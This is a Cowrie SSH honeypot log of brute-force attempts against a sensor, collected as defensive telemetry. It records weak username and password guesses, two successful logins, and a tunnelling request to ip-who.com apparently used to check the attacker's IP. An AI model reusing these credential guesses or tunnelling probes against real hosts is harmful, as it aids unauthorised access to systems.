{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T04:51:50.341545Z","src_ip":"212.227.235.229","session":"fd84ff396d28"}
{"eventid":"cowrie.login.success","username":"root","password":"abc123","message":"login attempt [root/abc123] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:51:50.397182Z","src_ip":"212.227.235.229","session":"c10e4adeab14"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59892,"dst_ip":"1.2.3.4","dst_port":22,"session":"08e0d6e4b40b","protocol":"ssh","message":"New connection: 212.227.235.229:59892 (1.2.3.4:22) [session: 08e0d6e4b40b]","sensor":"my-vps","timestamp":"2025-08-31T04:51:50.416298Z"}
{"eventid":"cowrie.login.failed","username":"library","password":"library","message":"login attempt [library/library] failed","sensor":"my-vps","timestamp":"2025-08-31T04:51:50.639941Z","src_ip":"212.227.235.229","session":"84270d7546d7"}
{"eventid":"cowrie.login.failed","username":"popo","password":"popo","message":"login attempt [popo/popo] failed","sensor":"my-vps","timestamp":"2025-08-31T04:51:50.650377Z","src_ip":"212.227.235.229","session":"fd84ff396d28"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"ip-who.com","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to ip-who.com:80 from :0","sensor":"my-vps","timestamp":"2025-08-31T04:51:50.668985Z","session":"c10e4adeab14"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40884,"dst_ip":"1.2.3.4","dst_port":22,"session":"620d5a675b30","protocol":"ssh","message":"New connection: 212.227.125.160:40884 (1.2.3.4:22) [session: 620d5a675b30]","sensor":"my-vps","timestamp":"2025-08-31T04:51:50.864058Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:51:50.865008Z","src_ip":"212.227.125.160","session":"620d5a675b30"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"ip-who.com","dst_port":80,"data":"b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to ip-who.com:80 with data b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T04:51:50.920088Z","src_ip":"212.227.235.229","session":"c10e4adeab14"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:51:51.053890Z","src_ip":"212.227.125.160","session":"620d5a675b30"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:51:51.193836Z","src_ip":"212.227.235.229","session":"08e0d6e4b40b"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T04:51:51.194898Z","src_ip":"212.227.235.229","session":"08e0d6e4b40b"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:51:51.409226Z","src_ip":"212.227.235.229","session":"c10e4adeab14"}
{"eventid":"cowrie.login.failed","username":"tomcat","password":"123456","message":"login attempt [tomcat/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T04:51:51.623349Z","src_ip":"212.227.125.160","session":"620d5a675b30"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:51:51.753700Z","src_ip":"212.227.235.229","session":"fd84ff396d28"}
{"eventid":"cowrie.session.closed","duration":"3.9","message":"Connection lost after 3.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:51:51.899202Z","src_ip":"212.227.235.229","session":"84270d7546d7"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:51:52.814386Z","src_ip":"212.227.125.160","session":"620d5a675b30"}
{"eventid":"cowrie.login.failed","username":"root","password":"123456","message":"login attempt [root/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T04:51:57.189906Z","src_ip":"212.227.235.229","session":"08e0d6e4b40b"}
{"eventid":"cowrie.session.closed","duration":"8.5","message":"Connection lost after 8.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:51:58.930730Z","src_ip":"212.227.235.229","session":"08e0d6e4b40b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42016,"dst_ip":"1.2.3.4","dst_port":22,"session":"e02485fff175","protocol":"ssh","message":"New connection: 212.227.235.229:42016 (1.2.3.4:22) [session: e02485fff175]","sensor":"my-vps","timestamp":"2025-08-31T04:51:59.657773Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:51:59.690390Z","src_ip":"212.227.235.229","session":"e02485fff175"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:51:59.965610Z","src_ip":"212.227.235.229","session":"e02485fff175"}
{"eventid":"cowrie.login.failed","username":"test","password":"teest","message":"login attempt [test/teest] failed","sensor":"my-vps","timestamp":"2025-08-31T04:52:01.368351Z","src_ip":"212.227.235.229","session":"e02485fff175"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47516,"dst_ip":"1.2.3.4","dst_port":22,"session":"4949b2d7717c","protocol":"ssh","message":"New connection: 212.227.125.160:47516 (1.2.3.4:22) [session: 4949b2d7717c]","sensor":"my-vps","timestamp":"2025-08-31T04:52:01.454746Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:52:01.455821Z","src_ip":"212.227.125.160","session":"4949b2d7717c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:52:01.648833Z","src_ip":"212.227.125.160","session":"4949b2d7717c"}
{"eventid":"cowrie.login.failed","username":"git","password":"123","message":"login attempt [git/123] failed","sensor":"my-vps","timestamp":"2025-08-31T04:52:02.228443Z","src_ip":"212.227.125.160","session":"4949b2d7717c"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:52:03.423321Z","src_ip":"212.227.125.160","session":"4949b2d7717c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42038,"dst_ip":"1.2.3.4","dst_port":22,"session":"a2ba52fcafa9","protocol":"ssh","message":"New connection: 212.227.235.229:42038 (1.2.3.4:22) [session: a2ba52fcafa9]","sensor":"my-vps","timestamp":"2025-08-31T04:52:03.600071Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:52:03.607763Z","src_ip":"212.227.235.229","session":"a2ba52fcafa9"}
{"eventid":"cowrie.session.closed","duration":"4.1","message":"Connection lost after 4.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:52:03.730803Z","src_ip":"212.227.235.229","session":"e02485fff175"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:52:04.167753Z","src_ip":"212.227.235.229","session":"a2ba52fcafa9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42044,"dst_ip":"1.2.3.4","dst_port":22,"session":"3e19809ce670","protocol":"ssh","message":"New connection: 212.227.235.229:42044 (1.2.3.4:22) [session: 3e19809ce670]","sensor":"my-vps","timestamp":"2025-08-31T04:52:04.588250Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:52:04.589079Z","src_ip":"212.227.235.229","session":"3e19809ce670"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:52:04.960746Z","src_ip":"212.227.235.229","session":"3e19809ce670"}
{"eventid":"cowrie.login.success","username":"root","password":"htpcguides","message":"login attempt [root/htpcguides] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:52:04.990440Z","src_ip":"212.227.235.229","session":"a2ba52fcafa9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"ip-who.com","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to ip-who.com:80 from :0","sensor":"my-vps","timestamp":"2025-08-31T04:52:05.836122Z","session":"a2ba52fcafa9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46430,"dst_ip":"1.2.3.4","dst_port":22,"session":"a0d4914b2cf7","protocol":"ssh","message":"New connection: 212.227.235.229:46430 (1.2.3.4:22) [session: a0d4914b2cf7]","sensor":"my-vps","timestamp":"2025-08-31T04:52:05.876683Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:52:05.900420Z","src_ip":"212.227.235.229","session":"a0d4914b2cf7"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-c